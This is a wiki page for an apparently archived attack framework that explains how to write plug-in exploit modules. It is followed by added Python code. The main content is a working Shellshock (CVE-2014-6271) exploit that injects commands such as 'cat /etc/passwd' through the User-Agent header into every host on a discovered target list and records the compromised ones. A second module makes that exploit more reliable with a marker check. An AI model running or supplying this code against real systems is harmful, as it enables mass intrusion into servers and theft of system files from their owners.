This repository has been archived by the owner on Jan 25, 2019. It is now read-only.

Writing Custom Exploits

Utku Sen edited this page Apr 26, 2017 · 1 revision

Introduction

In the "Custom Exploit" module, you can run your own exploit against the targets discovered by the Discovery module. If you have no discovered targets, there is nothing to exploit; see the "Discovery" page for that step first.

Available exploits are located under the /lib/exploits folder. To add your own exploit, put it in that directory.

Writing Your Own Exploit

Exploits are written in Python version 2.7.

Helper Functions

discovery_parse

To parse pre-discovered targets, import the discovery_parse function from lib/utils.py:

from lib.utils import discovery_parse

discovery_parse takes a discovery id (string) and returns the elements of the matching discovery file (IPs or URLs) as a list.

For example, if censys_ssh_28381923.txt contains the following targets:

192.168.1.5
192.168.1.89

Calling discovery_parse("28381923") will return:

['192.168.1.5','192.168.1.89']

You can then run your exploit code against these targets in a loop.

compromise_save

To save successfully exploited targets, import the compromise_save function from lib/utils.py:

from lib.utils import compromise_save

compromise_save takes 3 parameters: discovery_id, exploit_name and asset_list. It creates a file under /assets/compromised containing the successfully exploited targets, named "custom_exploitname_discoveryid.txt", for example "custom_struts_2849312.txt".

discovery_id: pass through the value given by the user (the same id you passed to discovery_parse).

exploit_name: a generic name for the exploit, using only alphanumeric characters, for example "struts".

asset_list: the list to which you appended the successfully exploited targets. compromise_save writes each entry to the text file.
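As an added illustration of the two helper contracts described above (this is a local stand-in, not the project's own lib/utils.py, whose source is not shown on this page), the following code looks up a discovery file by the numeric id at the end of its name, parses it into a list, and writes the compromised-assets file with the "custom_exploitname_discoveryid.txt" naming rule. The directory assets/discovered for discovery files is an assumption; assets/compromised follows the page. The sample discovery file is constructed inline so the example runs offline.

```python
import glob
import os
import tempfile


def discovery_parse_local(discovery_id, discovered_dir):
    """Stand-in for lib.utils.discovery_parse (assumption: discovery files are
    named <source>_<discovery_id>.txt, e.g. censys_ssh_28381923.txt, one target
    per line). Returns the non-empty lines as a list, or [] if no file matches."""
    matches = glob.glob(os.path.join(discovered_dir, "*_%s.txt" % discovery_id))
    if not matches:
        return []
    with open(matches[0]) as f:
        return [line.strip() for line in f if line.strip()]


def compromise_save_local(discovery_id, exploit_name, asset_list, compromised_dir):
    """Stand-in for lib.utils.compromise_save: writes
    custom_<exploit_name>_<discovery_id>.txt, one target per line, and returns
    the path. Enforces the page's rule that exploit_name is alphanumeric, since
    it becomes part of a file name."""
    if not exploit_name.isalnum():
        raise ValueError("exploit_name must be alphanumeric: %r" % exploit_name)
    if not os.path.isdir(compromised_dir):
        os.makedirs(compromised_dir)
    path = os.path.join(compromised_dir, "custom_%s_%s.txt" % (exploit_name, discovery_id))
    with open(path, "w") as f:
        for asset in asset_list:
            f.write(asset + "\n")
    return path


def demo():
    """Offline run: creates the page's example discovery file in a temporary
    asset tree, parses it, and saves the first target as 'compromised'."""
    root = tempfile.mkdtemp()
    discovered = os.path.join(root, "assets", "discovered")    # assumed location
    compromised = os.path.join(root, "assets", "compromised")  # location from the page
    os.makedirs(discovered)
    with open(os.path.join(discovered, "censys_ssh_28381923.txt"), "w") as f:
        f.write("192.168.1.5\n192.168.1.89\n")   # constructed sample targets
    targets = discovery_parse_local("28381923", discovered)
    path = compromise_save_local("28381923", "struts", targets[:1], compromised)
    with open(path) as f:
        saved = f.read().splitlines()
    return targets, os.path.basename(path), saved


if __name__ == "__main__":
    print(demo())
```

The id is matched as a suffix of the file name, so the caller never needs to know which discovery source (censys, shodan, ...) produced the file; the alphanumeric check on exploit_name is what keeps a user-supplied name from escaping the /assets/compromised directory.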

Required Functions

show_desc

This function provides the basic info shown about the exploit in the menu. It needs to return an info string. For example:

def show_desc():
    return "Shellshock Remote Code Execution (CVE-2014-6271)"

exploit

This is where your code sends the payload to the target. It returns the target's response.

action

-The action function needs to take a "discovery_id": the numeric discovery id entered by the user (the id in the discovery file name, e.g. 28381923 above).

def action(discovery_id):

-You need to call discovery_parse function with discovery_id value in order to get target URLs or IP addresses.

urllist = discovery_parse(discovery_id)

-For every url in urllist, call exploit function

for url in urllist:
        response = exploit(url, "cat /etc/passwd")

-If exploit was successful, append the URL/IP to a list.

successful_urls.append(url)

-After all targets are done, save the successful URLs with the compromise_save function:

if successful_urls: #if not empty        
        compromise_save(discovery_id, exploit_name, successful_urls)

Example Exploit

The following exploit identifies the Shellshock vulnerability (CVE-2014-6271): it sends a command in a crafted User-Agent header and treats the target as vulnerable if the response contains "root". Note that this is a coarse success test; any page that happens to contain the word "root" would also be counted as exploited.

from lib.utils import discovery_parse, compromise_save
import urllib2

exploit_name = "shellshock" #this goes to file name

#Tries to exploit the given url with the given command. Returns the server's response
#body as a string, or "" if the request failed.

def exploit(url, command):
    response = ""
    opener = urllib2.build_opener()
    #Shellshock trigger: CGI exports User-Agent as the HTTP_USER_AGENT environment
    #variable; a vulnerable bash imports the function definition and then also runs
    #the commands that follow it.
    opener.addheaders = [('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; ' + command)]
    try:
        response = opener.open(url).read()
    except Exception: #connection errors, timeouts, HTTP errors
        pass
    return response

#Most of the work is done in this function. It parses targets with the given discovery id,
#checks if the exploit was successful, appends successful ones to a list and saves them with
#the compromise_save function

def action(discovery_id):
    successful_urls = []
    urllist = discovery_parse(discovery_id)
    print urllist
    for url in urllist:
        response = exploit(url, "cat /etc/passwd")
        if "root" in response:
            successful_urls.append(url)
            print "Vulnerable! " + url
    if successful_urls:
        compromise_save(discovery_id, exploit_name, successful_urls)

def show_desc():
    return "Shellshock Remote Code Execution (CVE-2014-6271)"
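The module below is an added example, not code from the original page or the project: it follows the same show_desc / exploit / action contract but replaces the "root" substring check with a random marker that the payload echoes back, so only a host that actually executed the injected command is reported. It runs offline: the opener is injectable, and FakeOpener, _FakeResponse, the hostnames vulnerable.example and patched.example, and the discovery id 2838192 are constructed for the demo. The real lib.utils helpers are imported only when action is called without stand-ins, as it would be inside the framework; that import is assumed to work there.

```python
from __future__ import print_function

import random
import string

try:                            # Python 2.7, which the framework's exploits target
    import urllib2
except ImportError:             # Python 3 fallback so the module also runs there
    import urllib.request as urllib2

exploit_name = "shellshock"     # goes into the compromised-assets file name


def show_desc():
    return "Shellshock Remote Code Execution (CVE-2014-6271), marker-based check"


def make_marker(length=16):
    # Random token the payload echoes back; only a host that executed it can return it.
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))


def build_header(command, marker):
    # Shellshock trigger: a function definition followed by trailing commands, which a
    # vulnerable bash executes when it imports the variable (HTTP_USER_AGENT under CGI).
    return "() { :;}; echo Content-Type: text/plain; echo; echo %s; %s" % (marker, command)


def exploit(url, command, marker, opener=None):
    # Sends the payload in User-Agent and returns the body as text ("" on any error).
    # `opener` is injectable so the module can be exercised without network access.
    if opener is None:
        opener = urllib2.build_opener()
    opener.addheaders = [("User-Agent", build_header(command, marker))]
    try:
        raw = opener.open(url, timeout=10).read()
    except Exception:           # refused, timeout, HTTP error: treat as not exploited
        return ""
    return raw.decode("utf-8", "replace") if isinstance(raw, bytes) else raw


def is_vulnerable(body, marker):
    # The marker, not "root", is the success signal, so a page that merely contains
    # the word "root" is not mistaken for a compromised host.
    return marker in body


def action(discovery_id, opener=None, parse=None, save=None):
    # Framework entry point. parse/save default to the real lib.utils helpers (assumed
    # importable inside the framework); they are parameters only for the offline demo.
    if parse is None or save is None:
        from lib.utils import discovery_parse, compromise_save
        parse = parse or discovery_parse
        save = save or compromise_save
    successful_urls = []
    for url in parse(discovery_id):
        marker = make_marker()
        if is_vulnerable(exploit(url, "id", marker, opener=opener), marker):
            successful_urls.append(url)
            print("Vulnerable! " + url)
    if successful_urls:
        save(discovery_id, exploit_name, successful_urls)
    return successful_urls


class FakeOpener(object):
    # Constructed stand-in for the urllib2 opener: one host behaves like a vulnerable
    # bash CGI (runs the echo commands after the function body), the other is patched
    # but serves a page containing the word "root".
    def __init__(self):
        self.addheaders = []

    def open(self, url, timeout=None):
        ua = dict(self.addheaders).get("User-Agent", "")
        if "vulnerable" in url and ua.startswith("() {") and "};" in ua:
            injected = ua.split("};", 1)[1]
            lines = [p.strip()[4:].strip() for p in injected.split(";") if p.strip().startswith("echo")]
            return _FakeResponse("\n".join(lines) + "\nuid=33(www-data)\n")
        return _FakeResponse("<html><title>root of the site</title></html>")


class _FakeResponse(object):
    def __init__(self, text):
        self._text = text

    def read(self):
        return self._text.encode("utf-8")


def demo():
    # Offline run against the two constructed hosts; returns what the framework would
    # get: the reported URLs and the file compromise_save would have written.
    hosts = ["http://vulnerable.example/cgi-bin/status.cgi", "http://patched.example/"]
    saved = {}

    def fake_save(did, name, assets):
        saved["custom_%s_%s.txt" % (name, did)] = list(assets)

    hits = action("2838192", opener=FakeOpener(), parse=lambda _id: hosts, save=fake_save)
    return hits, saved


if __name__ == "__main__":
    print(demo())
```

Dropped into /lib/exploits, the module is called by the framework as action(discovery_id) with the defaults, so the real discovery_parse and compromise_save are used; the patched host in the demo shows the false positive the original "root" check would have produced.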